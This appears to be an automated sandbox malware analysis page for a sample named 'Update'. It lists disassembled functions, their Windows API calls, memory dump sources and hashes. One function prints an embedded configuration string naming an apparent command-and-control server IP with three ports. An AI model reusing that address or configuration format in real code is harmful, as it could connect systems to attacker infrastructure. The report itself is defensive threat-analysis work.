Opcode ID: dd947b8632db1f28b052ecf124db9b28bf489f539e3209f6eb44e0368f952d65
Instruction ID: 787869627df2182ba89514bf737d7935729bc256225482e779d5ead0b003eade
Opcode Fuzzy Hash: dd947b8632db1f28b052ecf124db9b28bf489f539e3209f6eb44e0368f952d65
Instruction Fuzzy Hash: B4017AB0A00B448FC331DF6A9844A0BFAF8BF98700B504A2ED2DAC6B10D374A105CF55

Function 10006410 Relevance: 3.0, APIs: 2, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNEL32(00000004,00000000,00000000,?,00000000,10005AF2), ref: 1000642B
_free.LIBCMT ref: 10006466

Part of subcall function 10001280: __CxxThrowException@8.LIBCMT ref: 10001290
Part of subcall function 10001280: DeleteCriticalSection.KERNEL32(00000000,?,10017E78), ref: 100012A1

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: CreateCriticalDeleteException@8HeapSectionThrow_free
String ID:
API String ID: 1116298128-0
Opcode ID: a128095ffdd49348268c3586f1fd9261e0840fd0acd737389bb6af715d81e8f7
Instruction ID: d75aab6d42964042dd9719b22c7254e4122bf8c787039a32894d973a0e8f9c7d
Opcode Fuzzy Hash: a128095ffdd49348268c3586f1fd9261e0840fd0acd737389bb6af715d81e8f7
Instruction Fuzzy Hash: D6017EF4A00B408FD321CF6A8884A47FAF9FF98750B104A1EE2DAC7A10D770A545CF55

Function 037FE480 Relevance: 3.0, APIs: 2, Instructions: 21synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,037FDF10,00000000,00000000,00000000), ref: 037FE49B
WaitForSingleObject.KERNEL32(00000000,000000FF,?,03801168,?,?,?,?,?,?,03816298,0000000C,03801210,?), ref: 037FE4A9

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: CreateObjectSingleThreadWait
String ID:
API String ID: 1891408510-0
Opcode ID: 148836afcfc040c4567257d69d60cdca3a6ac41e0a8966f3fd1331f9d594f10c
Instruction ID: 32bcb716f44ca722e3053c3ed5f6d055495642fc84af0217fe3b49d3d20ac4bb
Opcode Fuzzy Hash: 148836afcfc040c4567257d69d60cdca3a6ac41e0a8966f3fd1331f9d594f10c
Instruction Fuzzy Hash: 0BE05BB0444A09BFDF20EF74AC88E3673DCE7147307204675BA24C2399D531A840C660

Function 037FF983 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 037FF98F

Part of subcall function 03803E5B: __getptd_noexit.LIBCMT ref: 03803E5E
Part of subcall function 03803E5B: __amsg_exit.LIBCMT ref: 03803E6B

Part of subcall function 037FF964: __getptd_noexit.LIBCMT ref: 037FF969
Part of subcall function 037FF964: __freeptd.LIBCMT ref: 037FF973
Part of subcall function 037FF964: ExitThread.KERNEL32 ref: 037FF97C

__XcptFilter.LIBCMT ref: 037FF9B0

Part of subcall function 0380418F: __getptd_noexit.LIBCMT ref: 03804195

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
String ID:
API String ID: 418257734-0
Opcode ID: ec6894eb9f0cf7d55ce385f56ef3a23ffee9c45a6e64119e635b79e938a53361
Instruction ID: bfd9b06e1f147cc7b00641f6065d3034b318cea2073a0da98fad31c65fc8ccdb
Opcode Fuzzy Hash: ec6894eb9f0cf7d55ce385f56ef3a23ffee9c45a6e64119e635b79e938a53361
Instruction Fuzzy Hash: DEE0ECB9940701EFDB18EBE5DC45E7D7779AF44601F210188E201AF2A1CB799941DE21

Function 10007175 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 10007181

Part of subcall function 1000990F: __getptd_noexit.LIBCMT ref: 10009912
Part of subcall function 1000990F: __amsg_exit.LIBCMT ref: 1000991F

Part of subcall function 10007156: __getptd_noexit.LIBCMT ref: 1000715B
Part of subcall function 10007156: __freeptd.LIBCMT ref: 10007165
Part of subcall function 10007156: ExitThread.KERNEL32 ref: 1000716E

__XcptFilter.LIBCMT ref: 100071A2

Part of subcall function 10009C41: __getptd_noexit.LIBCMT ref: 10009C47

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: __getptd_noexit$ExitFilterThreadXcpt__amsg_exit__freeptd__getptd
String ID:
API String ID: 418257734-0
Opcode ID: 297936fcc0dbf5f526c0e08448a2f351abf61589ee907ea93caa2c8fedee672a
Instruction ID: 91050fa4c4edb40f5b5d990f834f761f3b027d6385ed46559f27b3ea4901cb17
Opcode Fuzzy Hash: 297936fcc0dbf5f526c0e08448a2f351abf61589ee907ea93caa2c8fedee672a
Instruction Fuzzy Hash: 76E0ECB9904604DFF718DBA0C956E6E7775EF44241F210049F1015B2A6CB35B940DB24

Function 03806403 Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 0380641B

Part of subcall function 03808E5B: __amsg_exit.LIBCMT ref: 03808E7D
Part of subcall function 03808E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03803F06,0000000D,03816340,00000008,03803FFF,00000000,?,038010F0,00000000,03816278,00000008,03801155,?), ref: 03808E85

__tzset_nolock.LIBCMT ref: 0380642C

Part of subcall function 03805D22: __lock.LIBCMT ref: 03805D44
Part of subcall function 03805D22: ____lc_codepage_func.LIBCMT ref: 03805D8B
Part of subcall function 03805D22: __getenv_helper_nolock.LIBCMT ref: 03805DAD
Part of subcall function 03805D22: _free.LIBCMT ref: 03805DE4
Part of subcall function 03805D22: _strlen.LIBCMT ref: 03805DEB
Part of subcall function 03805D22: __malloc_crt.LIBCMT ref: 03805DF2
Part of subcall function 03805D22: _strlen.LIBCMT ref: 03805E08
Part of subcall function 03805D22: _strcpy_s.LIBCMT ref: 03805E16
Part of subcall function 03805D22: __invoke_watson.LIBCMT ref: 03805E2B
Part of subcall function 03805D22: _free.LIBCMT ref: 03805E3A

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: __lock_free_strlen$CriticalEnterSection____lc_codepage_func__amsg_exit__getenv_helper_nolock__invoke_watson__malloc_crt__tzset_nolock_strcpy_s
String ID:
API String ID: 3577994687-0
Opcode ID: d1905ef5ab3cd61402f4695766068c2e3deae4f257f39283e1a5916482d0d37b
Instruction ID: 4d93759e993604adad575d84c506ffd625b2d6f959fcd17037eb093c1bb86828
Opcode Fuzzy Hash: d1905ef5ab3cd61402f4695766068c2e3deae4f257f39283e1a5916482d0d37b
Instruction Fuzzy Hash: A0E0CDB9C81F10D7C6F1FBF86D02A0C7220ABE0F31F5041D5D551DA4C4D6340251CA53

Function 1000474C Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 12stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(|p1:137.220.229.61|o1:9091|t1:1|p2:137.220.229.61|o2:9092|t2:1|p3:137.220.229.61|o3:9093|t3:1|dd:1|cl:1|fz:), ref: 10004755

Part of subcall function 10003260: __wcsrev.LIBCMT ref: 10020655

Strings

|p1:137.220.229.61|o1:9091|t1:1|p2:137.220.229.61|o2:9092|t2:1|p3:137.220.229.61|o3:9093|t3:1|dd:1|cl:1|fz:, xrefs: 10004750

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: __wcsrevlstrlen
String ID: |p1:137.220.229.61|o1:9091|t1:1|p2:137.220.229.61|o2:9092|t2:1|p3:137.220.229.61|o3:9093|t3:1|dd:1|cl:1|fz:
API String ID: 4062721203-133397238
Opcode ID: ef503d5516fdfa215c481ae33ec846e637023be3d257a54ad483c27845c77df4
Instruction ID: 3065bb4344b1789bcecd08ba6036c617636919b35652953f12b0e4d8e139a27a
Opcode Fuzzy Hash: ef503d5516fdfa215c481ae33ec846e637023be3d257a54ad483c27845c77df4
Instruction Fuzzy Hash: EFC08C72208214CFF202E3D4988876D7359EB33722F608039FA00CD012E672CC8097B1

Function 037F6EBC Relevance: 3.0, APIs: 2, Instructions: 8registryCOMMON

Download Yara Rule

APIs

RegCloseKey.ADVAPI32(80000001,037F6E9A), ref: 037F6EC9
RegCloseKey.ADVAPI32(75BF73E0), ref: 037F6ED2

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 297763f53ffc06b3f09c17544eef4313315b69f7d51b01d2aa6a5f5697ccda22
Instruction ID: 471dd78d3a1a0edd763090e981767fe38bb8b75876a5c810380f912b2b7294c0
Opcode Fuzzy Hash: 297763f53ffc06b3f09c17544eef4313315b69f7d51b01d2aa6a5f5697ccda22
Instruction Fuzzy Hash: 55C09B72D0143857CF10F7A4FD4494D77BC9F4C210F1145C2A108A3114C634BD41CF90

Function 6CAB0EF2 Relevance: 2.6, APIs: 2, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,?,6CAB0EE1,6CAB9DDA,?,00000000,00000000), ref: 6CAB0F48
GetLastError.KERNEL32(?,00000000,?,6CAB0EE1,6CAB9DDA,?,00000000,00000000), ref: 6CAB0F52

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: CloseErrorHandleLast
String ID:
API String ID: 918212764-0
Opcode ID: ecaeebceaf537962adbae016799dba513c215ad03801fcc96ce1a12adb3db82b
Instruction ID: 3389cf4176e879568e6c55db48b2818bfd2bbaeb1b4252b7afcd9e103e71c0d4
Opcode Fuzzy Hash: ecaeebceaf537962adbae016799dba513c215ad03801fcc96ce1a12adb3db82b
Instruction Fuzzy Hash: FD114C327086905AC60917755B4979D3B9D4B8273CF2D4349E91CE7AC0EB30C9CA8280

Function 6CA97590 Relevance: 1.7, APIs: 1, Instructions: 199COMMON

Download Yara Rule

APIs

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 6CA977F3

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 323602529-0
Opcode ID: 82c8dfe2ec20ce6089d6270a3f39404919580cf6dad16e38d0d81ca0b97dc5a8
Instruction ID: 12dcbd77d07bdec1f9523ea31a26c0b4cbcf5799db732740bc39061db37ed684
Opcode Fuzzy Hash: 82c8dfe2ec20ce6089d6270a3f39404919580cf6dad16e38d0d81ca0b97dc5a8
Instruction Fuzzy Hash: ED818DB1910B058FD324CF28C981BA6B7E5FF48304F548A2DD49A87B91E774F588CBA0

Function 6CAB0307 Relevance: 1.7, APIs: 1, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b5e556d0ee75180e04831f8c84e8448a041fa183930b1f821649dbe7987d53d
Instruction ID: 941562c213e92e8efa1ec1059f082edb32c0fc1fe78c03dcddba90bf6664be28
Opcode Fuzzy Hash: 9b5e556d0ee75180e04831f8c84e8448a041fa183930b1f821649dbe7987d53d
Instruction Fuzzy Hash: 7E51A7B0A00284AFDB05CF58CE84A9DBFB5EF45328F18C159E859AB751D371DAC6CB90

Function 6CAB069D Relevance: 1.6, APIs: 1, Instructions: 59COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 6CAB07F6

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 5de47762e49aa0ba01d7234bb37dbd5a0784c60f50d7eeaf288811bebc19bc0d
Instruction ID: 9f9bd6f04f034269bc0979193feff365206c37fa868b071aecba9f414776ddb9
Opcode Fuzzy Hash: 5de47762e49aa0ba01d7234bb37dbd5a0784c60f50d7eeaf288811bebc19bc0d
Instruction Fuzzy Hash: 49114FB1A0420AAFCB05DF58EA4499B7BF9FF48304F154059F805AB311DA71DA15CBA4

Function 0380A6F2 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0380454A,00000000,00000001,00000000,00000000,00000000,?,03803E0D,00000001,00000214,?,03801EEF), ref: 0380A735

Part of subcall function 037FF91B: __getptd_noexit.LIBCMT ref: 037FF91B

Memory Dump Source

Source File: 00000003.00000002.3510757808.00000000037F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 037F0000, based on PE: true

Associated: 00000003.00000002.3510757808.0000000003824000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37f0000_Update.jbxd

Yara matches

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: a29bfb9b5fe081b2189aa41eb9090c68ebb3dc18485be50d0a39c67afd79df50
Instruction ID: dbbee97caa768607954156cae9202d36e581679a18b4ab5b4a6dad54ac322190
Opcode Fuzzy Hash: a29bfb9b5fe081b2189aa41eb9090c68ebb3dc18485be50d0a39c67afd79df50
Instruction Fuzzy Hash: 5101B5393017159EEB6CDEA9DC54B6A77A8AB817A0F19C6E9E895CB1E0DB3884018740

Function 1000E555 Relevance: 1.6, APIs: 1, Instructions: 50memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,10009FFA,00000000,00000001,00000000,00000000,00000000,?,100098C1,00000001,00000214,?,10009FB0), ref: 1000E598

Part of subcall function 1000710D: __getptd_noexit.LIBCMT ref: 1000710D

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: d06f835299f278651632b800e6ea60e14773797a6a441bb7e279904f59b9ce12
Instruction ID: 103cc215c0c144a9a87f3cbc911116c8ac8a7c4356fc0ca5ef77af160fbe558d
Opcode Fuzzy Hash: d06f835299f278651632b800e6ea60e14773797a6a441bb7e279904f59b9ce12
Instruction Fuzzy Hash: E9012435205A958EFB18CF24CC54B5A37D4EB853E6F018929E815AA0D4EB70DC00CB80

Function 6CAB3515 Relevance: 1.5, APIs: 1, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6CAAA641: HeapAlloc.KERNEL32(00000000,6CAADBE2,?,?,6CAADBE2,00000220,?,?,?), ref: 6CAAA673

RtlReAllocateHeap.NTDLL(00000000,00000000,?,6CAA2C0C,00000000,?,6CAAFC77,00000000,6CAA2C0C,75FFDC79,?,75FFDC75,?,6CAA2CE6,?,75FFDC79), ref: 6CAB3572

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: Heap$AllocAllocate
String ID:
API String ID: 2177240990-0
Opcode ID: 48b55c8930c607e5dcd5741cf21d7a308de36ca64dd1081971337ff6978e9416
Instruction ID: f7a910dac391af4b74b32cdc1d6579f183f8a0328fc692f34cddbf8f411f3162
Opcode Fuzzy Hash: 48b55c8930c607e5dcd5741cf21d7a308de36ca64dd1081971337ff6978e9416
Instruction Fuzzy Hash: 34F028322431057F9B051A2FAE00BEA37AC8FC2A68B158315E854B7990EF30D6D98561

Function 6CAACF6F Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,?,?,6CAAA8E0,00000001,00000364,?,00000006,000000FF,?,?,6CAA5151,?,6CA81A6D,00000000), ref: 6CAACFB0

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 9a573e777e9b210cee5b0b0f6e671aba0d5e4e9341cd892144ac378acca0ed16
Instruction ID: e105b79095c2583477c7716b607db73b5a94ded5c0bf195480fb3f485c1c83bd
Opcode Fuzzy Hash: 9a573e777e9b210cee5b0b0f6e671aba0d5e4e9341cd892144ac378acca0ed16
Instruction Fuzzy Hash: E2F0E9326497255BFF017EE68804A8F77989F4976CB28C122EC18D7980DB32D99783E0

Function 1000608A Relevance: 1.5, APIs: 1, Instructions: 25registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32 ref: 100060A0

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: ce9d18141ac8a2415a65a9b8a38807c62c68c0f35cc9388145c160860f9cea29
Instruction ID: d3b2713253b45803e0e36550a0a091f6b3b019736998aa0157c013c20421de29
Opcode Fuzzy Hash: ce9d18141ac8a2415a65a9b8a38807c62c68c0f35cc9388145c160860f9cea29
Instruction Fuzzy Hash: B2E09274908216EADB25DB80C984BFE73B5FB64385F30814DE8042F094D375AE84AA91

Function 6CAB9FEC Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(FFFFFFFF,00000000,?,6CAB9C90,?,?,00000000,?,6CAB9C90,FFFFFFFF,0000000C), ref: 6CABA009

Memory Dump Source

Source File: 00000003.00000002.3511675369.000000006CA81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CA80000, based on PE: true

Associated: 00000003.00000002.3511657039.000000006CA80000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511704296.000000006CABD000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511724482.000000006CACB000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.3511743467.000000006CAD0000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6ca80000_Update.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f6bdc8376301cec6160e22a50b7af9ae623a51c763608ff7c4f9c7872ec87123
Instruction ID: b096faee2adb9d6c7398ac52d8e7008ff443401c2949a03840b4afd9f77167c7
Opcode Fuzzy Hash: f6bdc8376301cec6160e22a50b7af9ae623a51c763608ff7c4f9c7872ec87123
Instruction Fuzzy Hash: FAD06C3210020DBBDF028E85DC46EDA3BAAFB48714F018000BA1896020C732E9A2EB90

Function 10005E07 Relevance: 1.5, APIs: 1, Instructions: 14registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNEL32 ref: 1001F0F9

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
Instruction ID: fe46c43de78f47d222b333b3703367a29387d0af8959c827854050506a177f75
Opcode Fuzzy Hash: bc9ecc6ca19783af6d6fbb40ca28845bcba02b8ce6e2273daa9cad6eb9c5806e
Instruction Fuzzy Hash: 26C08C30C4C75EE2D032E8101C0A1BDB3E4E778299F3005BFAC452D884E4F4A9C0B6EA

Function 100060DF Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 1001FAB1

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511637000.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_Update.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: aaf3e0f0d0f8f1f3a4ac2f5b8bd5fab41d3eaa100fa15abfee4d2d644b7fd40f
Instruction ID: 723c430d69d621f95a846468934f8435ff5600678504d51602c72318876ab3a6
Opcode Fuzzy Hash: aaf3e0f0d0f8f1f3a4ac2f5b8bd5fab41d3eaa100fa15abfee4d2d644b7fd40f
Instruction Fuzzy Hash: B9D012B8104910C7E310DB50C4C465EB2E1FF58300F30C519E92D8B615C738F8C18652

Function 10004274 Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,00000000,Function_00006110,00000000), ref: 10020693

Memory Dump Source

Source File: 00000003.00000002.3511559847.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3511541678.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511581708.0000000010015000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511600158.0000000010019000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3511618919.000000001001F000.00000020.00001000.00020000.00000000.sdmpDownload File
